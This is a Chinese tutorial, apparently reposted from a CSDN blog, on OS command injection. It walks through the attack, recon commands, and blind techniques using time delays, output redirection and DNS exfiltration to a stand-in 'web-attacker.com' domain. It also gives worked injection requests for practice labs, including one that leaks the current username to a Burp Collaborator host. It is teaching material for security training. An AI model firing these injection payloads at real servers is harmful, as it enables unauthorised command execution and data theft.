大家好,今天来为大家解答注入漏洞网站源码这个问题的一些问题点,包括「网络技术」WEB安全基础入门—操作系统命令注入(shell 注入)也一样很多人还不知道,因此呢,今天就来为大家分析分析,现在让我们一起来看看吧!如果解决了您的问题,还望您关注下本站哦,谢谢~
1.什么是操作系统命令注入
攻击者可在服务器端执行任意系统(OS)命令,获取敏感数据。通常攻击者会尝试利用系统内部的信任关系,将攻击转移到系统内的其他系统,获取更大权限。
2.攻击流程解析
以电商网站为例,经常有查询库存余量的功能,URL如下
https://insecure-website.com/stockStatus?productID=381&storeID=29
后台在处理此URL时,调用库存查询接口,由于历史原因,接口往往需要使用shell命令调用其他系统模块。类似如下命令
stockreport.pl38129
.pl是perl语言源程序文件的扩展名,参数值将作为参数传入该“脚本”进行调用库存余量查询。
如果将该脚本参数改为如下
stockreport.pl&echoaiwefwlguh&29
&为系统命令分隔符,会将上述一条命令差分为3条系统命令,显示结果如下:
Error-productIDwasnotprovided(stockreport.pl未得到有效参数,报错)
aiwefwlguh(echo命令执行)
29:commandnotfound(系统无法辨别的命令)
例题1
3.常用命令
发现漏洞后,应执行一些基础命令,查看相关系统信息。
目标LinuxWindows
当前用户名whoamiwhoami
操作系统uname-aver
网络配置ifconfigipconfig/all
网络连接状态netstat-annetstat-an
运行进程ps-eftasklist
4.命令注入盲注漏洞
有些命令注入命令,不会随响应包响应任何结果。如反馈信息页,当用户完成了反馈,点击提交后。系统允许会生成如下邮件命令发送给管理员
mail-s&34;-aFrom:peter@normal-user.netfeedback@vulnerable-website.com
这个命令就算存在的命令注入漏洞,但是在用户web端不会有任何回显。
但我们可以尝试以下方式进行测试漏洞是否存在
利用时间延迟测试漏洞存在
&ping-c10127.0.0.1&
系统若存在漏洞,将会发起10次ping命令,导致响应时间延迟。
例题2
利用输出重定向来获取结果
&whoami>/var/www/static/whoami.txt&
若命令执行成功,命令执行结果将会写入路径下的whoami.txt文件中。若能成功读取该文件,就能获取结果。
例题3
利用带外技术(OAST)获取结果
&nslookupkgji2ohoyw.web-attacker.com&
&nslookupwhoami.kgji2ohoyw.web-attacker.com&
使用命令nslookup来发起DNS对特定域名(攻击者控制的域名)的查询。通过查询访问记录获取结果
例题4、5
5.常用注入操作符
window与类linux系统通用
&
&&
|
||
类linux专用
;
0x0aor\\n(换新行)
类linux行内命令执行
command
$(command)
注意:命令注入要注意是否有引号等包裹,注意闭合后溢出,命令才能执行
6.漏洞实例
1.操作系统命令注入,简单案例(OScommandinjection,simplecase)
目标
在查看库存量功能处存在命令执行漏洞。执行whoami命令回显当前用户
解题详情
productId=1&storeId=1|ps%20-ef
productId=1&storeId=1|whoami
productId=1&storeId=1;whoami
2.带有时延的操作系统命令盲注入(BlindOScommandinjectionwithtimedelays)
目标
在问题反馈功能处存在盲注命令执行漏洞,执行盲注导致10s延迟
解题详情
name=fssa&email=123%40123.com||ping%20-c%2010%20192.168.1.1||&subject=13&message=adfs
name=fssa&email=123%40123.com;ping%20-c%2010%20192.168.1.1;&subject=13&message=adfs
3.带有输出重定向的盲注操作系统命令注入(BlindOScommandinjectionwithoutputredirection)
目标
在问题反馈功能处存在盲注命令执行漏洞,执行whoami命令,将结果输出重定向到/var/www/images/,获取结果。
解题详情
POST/feedback/submitHTTP/1.1
Host:ac7f1f491f106b8fc08829fc00b50011.web-security-academy.net
csrf=f29VvEikq8kD255HWZvBLeu18JAX33Ei&name=1&email=123%40123.com||whoami%20>%20/var/www/images/result.txt||&subject=123&message=hello
GET/image?filename=result.txtHTTP/1.1
Host:ac7f1f491f106b8fc08829fc00b50011.web-security-academy.net
Cookie:session=TekRg9mt7CtTUqeyrHh8toH3lyZiUXTu
4.带外交互的盲注操作系统命令注入(BlindOScommandinjectionwithout-of-bandinteraction)
目标
在问题反馈功能处存在盲注命令执行漏洞,利用BurpCollaborator执行DNSlookup命令
解题详情
POST/feedback/submitHTTP/1.1
Host:acc91f7c1e635f04c0c01cc100fa0054.web-security-academy.net
csrf=hLmRCnMINZA3RlaRBGIx6djbKV0t5911&name=2&email=123%40123.com||nslookup%20xxy8f3kz49690drczkiwx10zbqhg55.burpcollaborator.net||&subject=2&message=hello
5.带外数据外泄的盲注操作系统命令注入(BlindOScommandinjectionwithout-of-banddataexfiltration)
目标
在问题反馈功能处存在盲注命令执行漏洞,利用OAST技术获取当前用户名信息并提交。
解题详情
POST/feedback/submitHTTP/1.1
Host:aca51fa91ec5cbaec0d2294d00f300a8.web-security-academy.net
csrf=mJQ6zYNSkbeEGecCkoqfLemDT8pQeklX&name=3&email=123%40123.com||nslookup%20`whoami`.okcz2u7qr0t0n4e3mb5nksnqyh48sx.burpcollaborator.net||&subject=3&message=hello
文章知识点与官方知识档案匹配,可进一步学习相关知识
————————————————
版权声明:本文为CSDN博主「Eason_LYC」的原创文章,遵循CC4.0BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/eason612/article/details/125150098
文章分享结束,注入漏洞网站源码和「网络技术」WEB安全基础入门—操作系统命令注入(shell 注入)的答案你都知道了吗?欢迎再次光临本站哦!
